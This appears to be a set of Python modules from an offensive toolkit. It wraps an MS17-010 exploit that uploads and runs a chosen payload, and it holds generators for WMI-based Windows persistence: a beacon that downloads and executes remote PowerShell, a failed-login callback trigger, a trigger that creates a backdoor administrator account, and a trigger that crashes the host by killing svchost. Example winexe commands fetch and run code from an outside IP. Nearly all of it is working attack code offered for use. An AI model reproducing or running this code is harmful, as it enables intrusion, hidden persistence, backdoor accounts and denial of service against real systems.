class create:
#define info here
info = '''
This is an info piece.
It will display whenever someone checks the info of this module
Consider it a small README
''' #what is the 'information' or 'README'
option_list=["option_a","option_b","option_c"] #a list of all possible options
#initialize variables here. All Variables must be initialized, even if the value is ""
#variables will have a name, value, IsRequired, and Description -- keep descriptions relativelt short, add to README if needed
#option=setting(str,str,bool,str)
option_a=setting("option_a","value_a",False,"value for option_a")
option_b=setting("option_b","",True,"value for option_b")
option_c=setting("option_c","value_c",False,"value for option_c")
#initialize power_beacon class
def __init__(self):
self.name="my_module_name"
def run(self) : #the actual function
#recommend doing all variable checking here
#variables won't be checked in dfconsole and will be passed as strings
print "These are the options I was passed and can use."
print self.option_a.value
print self.option_b.value
print self.option_c.value
class create:
#define info here
info = '''
MS17-010 exploit for Windows 2000 and later by sleepya
DRAGONFIRE: altered system call to upload and execute specified file, converted for dragonfire.
Note:
- The exploit should never crash a target (chance should be nearly 0%)
- Named pipe is needed
- Upload name is hard coded, might require changes to blend
Tested on:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
''' #what is the 'information' or 'README'
option_list = ["target", "payload",
"pipe_name"] #a list of all possible options
target = setting("target", "192.168.0.0", True, "Target IP address")
payload = setting("payload", "/payloads/payload.exe", True,
"Payload to upload")
pipe_name = setting("pipe_name", "", False,
"browser, spoolss, netlogon, lsarpc, samr")
#if len(sys.argv) < 3:
# print("{} <ip> <file> [pipe_name]".format(sys.argv[0]))
# sys.exit(1)
#target = sys.argv[1]
def __init__(self):
self.name = "ms17-10"
def run(self):
target = self.target.value
payload = self.payload.value
pipe_name = self.pipe_name.value
# pipe_name=self.pipe_name.value
if len(pipe_name) < 1:
pipe_name = None
#pipe_name = None #if len(pipe_name) < 1 else self.pipe_name.value
exploit(target, pipe_name, payload)
print('Own the Net!')
class create:
#define info here
beacon_settings='''
Beacon_Interval: How often you want the beacon. Select a number from the list below.
0 -- Every 15 Seconds
1 -- Every Minute
2 -- Every 15 Minutes
3 -- Every 30 Minutes
4 -- Every 1 Hour
'''
info = '''
This module will build a script for the creation of the WMI objects required to install a WMI based windows beaconer.
Settings:
IP: The IP address you want the beaconer to beacon to.
PORT: The port to use.
PATH: The name or path to the payload file on your web server.
Filter: Name of the WMI filter.
Consumer: Name of the WMI consumer.
OutputFile: Filename of the locally generated file.
Beacon_Interval: How often you want the beacon. Enter a number from the list below. Anything else will cause the module to exit.
0 -- Every 15 Seconds
1 -- Every Minute
2 -- Every 15 Minutes
3 -- Every 30 Minutes
4 -- Every 1 Hour
5 -- Every 4 Hours
Once the payload has been generated, either copy and paste the commands into a system level powershell, or download via a powershell download and execute.
'''
#create a list of possible options
option_list=["ip","port","path","filter","consumer","output_file","beacon_interval","use_ssl"]
#initialize variables
ip=setting("ip","1.1.1.1",True,"beacon ip address")
port=setting("port","8080",True,"beacon port")
path=setting("path","index.html",True,"path to download file on server")
use_ssl=setting("use_ssl","no",True,"use SSL for callback?")
filter=setting("filter","",True,"name of WMI filter")
consumer=setting("consumer","",True,"name of WMI consumer")
output_file=setting("output_file","",False,"local output filename")
beacon_interval=setting("beacon_interval","",True,"beacon interval...see info for options")
#initialize power_beacon class
def __init__(self):
self.name="powerbeacon"
def run(self) :
ip=self.ip.value
port=self.port.value
path=self.path.value
filter=self.filter.value
consumer=self.consumer.value
output=self.output_file.value
interval=self.beacon_interval.value
beacon=self.beacon_settings
use_ssl=self.use_ssl.value
try:
interval=int(interval)
except:
print "Invalid beacon_interval..."
print beacon
return
if (interval < 0) or (interval > 5):
print "Invalid beacon_interval..."
print beacon
return
interval_setting=""
if interval==1:
interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Second=0\""
if interval==2:
interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Minute=1 OR TargetInstance.Minute=15 OR TargetInstance.Minute=30 OR TargetInstance.Minute=45) AND TargetInstance.Second=0\""
if interval==3:
interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Minute=1 OR TargetInstance.Minute=30) AND TargetInstance.Second=0\""
if interval==4:
interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Minute=1) AND TargetInstance.Second=0\""
if interval==5:
interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Hour=0 OR TargetInstance.Hour=4 OR TargetInstance.Hour=8 OR TargetInstance.Hour=12 OR TargetInstance.Hour=16 OR TargetInstance.Hour=20) AND TargetInstance.Minute=1 AND TargetInstance.Second=0\""
if interval==0:
interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Second=0 OR TargetInstance.Second=15 OR TargetInstance.Second=30 OR TargetInstance.Second=45)\""
address=ip + ":" + port + "/" + path
if use_ssl == "no":
messageblock="\"powershell -command `\"iex(New-Object Net.WebClient).DownloadString('http://%s')`\"\"" % (address)
elif use_ssl == "yes":
messageblock = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Net.WebClient).DownloadString('https://%s')" % (address)
encodedmessage = b64encode(messageblock.encode('UTF-16LE'))
messageblock="\"powershell -e %s \"" % (encodedmessage)
else:
print "use_ssl must be either 'yes' or 'no'"
return
address=ip + ":" + port + "/" + path
data='''
$instanceFilter = ([wmiclass]"\\\.\\root\subscription:__EventFilter").CreateInstance()
$instanceFilter.QueryLanguage = "WQL"
%s
$instanceFilter.Name = "%s"
$instanceFilter.EventNamespace = 'root\cimv2'
$result = $instanceFilter.Put()
$newFilter = $result.Path
$instanceConsumer = ([wmiclass]"\\\.\\root\subscription:CommandLineEventConsumer").CreateInstance()
$instanceConsumer.Name = '%s'
$instanceConsumer.CommandLineTemplate = %s
$result = $instanceConsumer.Put()
$newConsumer = $result.Path
$instanceBinding = ([wmiclass]"\\\.\\root\subscription:__FilterToConsumerBinding").CreateInstance()
$instanceBinding.Filter = $newFilter
$instanceBinding.Consumer = $newConsumer
$result = $instanceBinding.Put()
$newBinding = $result.Path
''' % (interval_setting,filter,consumer,messageblock)
remove_data= '''
$x="\\\.\\root\subscription:__EventFilter.Name='%s'"
([wmi]$x).Delete()
$x="\\\.\\root\subscription:CommandLineEventConsumer.Name='%s'"
([wmi]$x).Delete()
$x='\\\.\\root\subscription:__FilterToConsumerBinding.Consumer="\\\\\\\\.\\\\root\\\\subscription:CommandLineEventConsumer.Name=\\"%s\\"",Filter="\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\"%s\\""'
([wmi]$x).Delete()
''' % (filter,consumer,consumer,filter)
if output=='':
print data
print "\n"
print "To Remove"
print "---------------------------------"
print remove_data
return
else:
output="output/"+output
f = open(output,'w')
f.write(data)
f.close()
output=output+"_remove"
f = open(output,'w')
f.write(remove_data)
f.close()
print "Files have been written..."
return
class create:
#define info here
info = '''
This is the failsafe for windows persistence module. After installing on a target, failing to login with 'FailName' perform a callback to a specified IP"
Once the payload has been generated, either copy and paste the commands into a system level powershell, or download via a powershell download and execute.
Ex:
winexe -U user%password //192.168.0.100 "powershell -c iex(New-Object Net.WebClient).DownloadString('http://192.168.0.136:8080/failsafe')"
#FAIL TO LOGIN
#After installed, fail to login with FailName@[CALLBACK_IP] example is for 127.0.0.1
winexe -U FailName@7F000001%password //192.168.0.100
'''
#create a list of possible options
option_list = [
"FailName", "callback_port", "callback_file", "filter", "consumer",
"reset_auditpol", "use_ssl", "output_file"
]
#initialize variables
FailName = setting("FailName", "", True, "Name to fail logon")
filter = setting("filter", "ServiceFilter", True, "name of WMI filter")
consumer = setting("consumer", "ServiceConsumer", True,
"name of WMI consumer")
callback_port = setting("callback_port", "4444", True, "Callback Port")
callback_file = setting("callback_file", "", True,
"Powershell file to get after failed login")
reset_auditpol = setting(
"reset_auditpol", "yes", True,
"Upon uninstall, reset auditpolicy to NOT log failures?")
use_ssl = setting("use_ssl", "no", True,
"Set to 'yes' if you want to use SSL")
output_file = setting("output_file", "", False, "local output filename")
#initialize power_beacon class
def __init__(self):
self.name = "powerbeacon"
def run(self):
FailName = self.FailName.value
filter = self.filter.value
consumer = self.consumer.value
output = self.output_file.value
callback_port = self.callback_port.value
callback_file = self.callback_file.value
reset_auditpol = self.reset_auditpol.value
use_ssl = self.use_ssl.value
if use_ssl == "no":
messageblock = '''if(wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4625]\" | findstr /i %s){$x=(wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4625]\" | findstr /i %s).split('@');iex(New-Object Net.WebClient).DownloadString('http://0x'+$x[1]+':%s/%s')}''' % (
FailName, FailName, callback_port, callback_file)
else:
messageblock = '''if(wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4625]\" | findstr /i %s){$x=(wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4625]\" | findstr /i %s).split('@');[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Net.WebClient).DownloadString('https://0x'+$x[1]+':%s/%s')}''' % (
FailName, FailName, callback_port, callback_file)
encodedmessage = b64encode(messageblock.encode('UTF-16LE'))
data = '''
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
$instanceFilter = ([wmiclass]"\\\.\\root\subscription:__EventFilter").CreateInstance()
$instanceFilter.QueryLanguage = "WQL"
$instanceFilter.Query ="select * from __InstanceCreationEvent where TargetInstance isa 'Win32_NtLogEvent' and TargetInstance.logfile = 'Security' and (TargetInstance.EventCode = '4625')"
$instanceFilter.Name = "%s"
$instanceFilter.EventNamespace = 'root\cimv2'
$result = $instanceFilter.Put()
$newFilter = $result.Path
$instanceConsumer = ([wmiclass]"\\\.\\root\subscription:CommandLineEventConsumer").CreateInstance()
$instanceConsumer.Name = '%s'
$instanceConsumer.CommandLineTemplate = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\powershell.exe -c "if(wevtutil qe security /rd:true /f:text /c:1 /q:`"*[System/EventID=4625]`" | findstr /i %s){powershell -e %s}"'
$result = $instanceConsumer.Put()
$newConsumer = $result.Path
$instanceBinding = ([wmiclass]"\\\.\\root\subscription:__FilterToConsumerBinding").CreateInstance()
$instanceBinding.Filter = $newFilter
$instanceBinding.Consumer = $newConsumer
$result = $instanceBinding.Put()
$newBinding = $result.Path
''' % (filter, consumer, FailName, encodedmessage)
remove_data = ''
if reset_auditpol == "yes":
remove_data = '''
auditpol /set /subcategory:"Logon" /success:enable /failure:disable
'''
remove_data += '''
$x="\\\.\\root\subscription:__EventFilter.Name='%s'"
([wmi]$x).Delete()
$x="\\\.\\root\subscription:CommandLineEventConsumer.Name='%s'"
([wmi]$x).Delete()
$x='\\\.\\root\subscription:__FilterToConsumerBinding.Consumer="\\\\\\\\.\\\\root\\\\subscription:CommandLineEventConsumer.Name=\\"%s\\"",Filter="\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\"%s\\""'
([wmi]$x).Delete()
''' % (filter, consumer, consumer, filter)
if (reset_auditpol != "yes") and (reset_auditpol != "no"):
print "reset_auditpol must be 'yes' or 'no'"
return
if (use_ssl != "yes") and (use_ssl != "no"):
print "use_ssl must be either yes or no"
return
if output == '':
print data
print "\n"
print "To Remove"
print "---------------------------------"
print remove_data
return
else:
output = "output/" + output
f = open(output, 'w')
f.write(data)
f.close()
output = output + "_remove"
f = open(output, 'w')
f.write(remove_data)
f.close()
print "Files have been written..."
return
class create:
#define info here
info = '''
This is the failsafe for windows persistence module. After installing on a target, failing to login with 'FailName' will create an admin account called "CreateName"
Once the payload has been generated, either copy and paste the commands into a system level powershell, or download via a powershell download and execute.
Ex:
winexe -U user%password //192.168.0.100 "powershell -c iex(New-Object Net.WebClient).DownloadString('http://192.168.0.136:8080/persist')"
'''
#create a list of possible options
option_list = [
"FailName", "CreateName", "password", "filter", "consumer",
"output_file"
]
#initialize variables
FailName = setting("FailName", "", True, "Name to fail logon")
CreateName = setting("CreateName", "", True, "New Username to add")
password = setting("password", "password", True, "PW for new user")
filter = setting("filter", "ServiceFilter", True, "name of WMI filter")
consumer = setting("consumer", "ServiceConsumer", True,
"name of WMI consumer")
output_file = setting("output_file", "", False, "local output filename")
#initialize power_beacon class
def __init__(self):
self.name = "powerbeacon"
def run(self):
FailName = self.FailName.value
password = self.password.value
CreateName = self.CreateName.value
filter = self.filter.value
consumer = self.consumer.value
output = self.output_file.value
data = '''
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
$instanceFilter = ([wmiclass]"\\\.\\root\subscription:__EventFilter").CreateInstance()
$instanceFilter.QueryLanguage = "WQL"
$instanceFilter.Query ="select * from __InstanceCreationEvent where TargetInstance isa 'Win32_NtLogEvent' and TargetInstance.logfile = 'Security' and (TargetInstance.EventCode = '4625')"
$instanceFilter.Name = "%s"
$instanceFilter.EventNamespace = 'root\cimv2'
$result = $instanceFilter.Put()
$newFilter = $result.Path
$instanceConsumer = ([wmiclass]"\\\.\\root\subscription:CommandLineEventConsumer").CreateInstance()
$instanceConsumer.Name = '%s'
$instanceConsumer.CommandLineTemplate = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\powershell.exe -c "if(wevtutil qe security /rd:true /f:text /c:1 /q:`"*[System/EventID=4625]`" | findstr /i %s){cmd /c net users %s %s /add `&`& net localgroup administrators %s /add}"'
$result = $instanceConsumer.Put()
$newConsumer = $result.Path
$instanceBinding = ([wmiclass]"\\\.\\root\subscription:__FilterToConsumerBinding").CreateInstance()
$instanceBinding.Filter = $newFilter
$instanceBinding.Consumer = $newConsumer
$result = $instanceBinding.Put()
$newBinding = $result.Path
''' % (filter, consumer, FailName, CreateName, password, CreateName)
remove_data = '''
auditpol /set /subcategory:"Logon" /success:enable /failure:disable
net users %s /delete
$x="\\\.\\root\subscription:__EventFilter.Name='%s'"
([wmi]$x).Delete()
$x="\\\.\\root\subscription:CommandLineEventConsumer.Name='%s'"
([wmi]$x).Delete()
$x='\\\.\\root\subscription:__FilterToConsumerBinding.Consumer="\\\\\\\\.\\\\root\\\\subscription:CommandLineEventConsumer.Name=\\"%s\\"",Filter="\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\"%s\\""'
([wmi]$x).Delete()
''' % (CreateName, filter, consumer, consumer, filter)
if output == '':
print data
print "\n"
print "To Remove"
print "---------------------------------"
print remove_data
return
else:
output = "output/" + output
f = open(output, 'w')
f.write(data)
f.close()
output = output + "_remove"
f = open(output, 'w')
f.write(remove_data)
f.close()
print "Files have been written..."
return
class create:
#define info here
info = '''
This module creates a WMI filter where failing to logon with 'FailName' crashed the box by deleting running instances of svchost.
Once the payload has been generated, either copy and paste the commands into a system level powershell, or download via a powershell download and execute.
Ex:
winexe -U user%password //192.168.0.100 "powershell -c iex(New-Object Net.WebClient).DownloadString('http://192.168.0.136:8080/persist')"
'''
#create a list of possible options
option_list=["FailName","filter","consumer","output_file","reset_auditpol"]
#initialize variables
FailName=setting("FailName","",True,"Name to fail logon")
filter=setting("filter","ServiceFilter",True,"name of WMI filter")
consumer=setting("consumer","ServiceConsumer",True,"name of WMI consumer")
output_file=setting("output_file","",False,"local output filename")
reset_auditpol=setting("reset_auditpol","yes",True,"reset auditpol on removal?")
#initialize power_beacon class
def __init__(self):
self.name="powerbeacon"
def run(self) :
FailName=self.FailName.value
filter=self.filter.value
consumer=self.consumer.value
output=self.output_file.value
reset_auditpol=self.reset_auditpol.value
data= '''
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
$instanceFilter = ([wmiclass]"\\\.\\root\subscription:__EventFilter").CreateInstance()
$instanceFilter.QueryLanguage = "WQL"
$instanceFilter.Query ="select * from __InstanceCreationEvent where TargetInstance isa 'Win32_NtLogEvent' and TargetInstance.logfile = 'Security' and (TargetInstance.EventCode = '4625')"
$instanceFilter.Name = "%s"
$instanceFilter.EventNamespace = 'root\cimv2'
$result = $instanceFilter.Put()
$newFilter = $result.Path
$instanceConsumer = ([wmiclass]"\\\.\\root\subscription:CommandLineEventConsumer").CreateInstance()
$instanceConsumer.Name = '%s'
$instanceConsumer.CommandLineTemplate = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\powershell.exe -c "if(wevtutil qe security /rd:true /f:text /c:1 /q:`"*[System/EventID=4625]`" | findstr /i %s){powershell -e dwBtAGkAYwAgAHAAcgBvAGMAZQBzAHMAIAB3AGgAZQByAGUAIABuAGEAbQBlAD0AYAAnAHMAdgBjAGgAbwBzAHQALgBlAHgAZQBgACcAIABkAGUAbABlAHQAZQA=}"'
$result = $instanceConsumer.Put()
$newConsumer = $result.Path
$instanceBinding = ([wmiclass]"\\\.\\root\subscription:__FilterToConsumerBinding").CreateInstance()
$instanceBinding.Filter = $newFilter
$instanceBinding.Consumer = $newConsumer
$result = $instanceBinding.Put()
$newBinding = $result.Path
''' % (filter,consumer,FailName)
remove_data= '''
$x="\\\.\\root\subscription:__EventFilter.Name='%s'"
([wmi]$x).Delete()
$x="\\\.\\root\subscription:CommandLineEventConsumer.Name='%s'"
([wmi]$x).Delete()
$x='\\\.\\root\subscription:__FilterToConsumerBinding.Consumer="\\\\\\\\.\\\\root\\\\subscription:CommandLineEventConsumer.Name=\\"%s\\"",Filter="\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\"%s\\""'
([wmi]$x).Delete()
''' % (filter,consumer,consumer,filter)
if (reset_auditpol!="yes" and reset_auditpol!="no"):
print "Enter 'yes' or 'no' for 'reset_auditpol'"
return
else:
if reset_auditpol=="yes":
remove_data=remove_data+"auditpol /set /subcategory:\"Logon\" /success:enable /failure:disable"
if output=='':
print data
print "\n"
print "To Remove"
print "---------------------------------"
print remove_data
return
else:
output="output/"+output
f = open(output,'w')
f.write(data)
f.close()
output=output+"_remove"
f = open(output,'w')
f.write(remove_data)
f.close()
print "Files have been written..."
return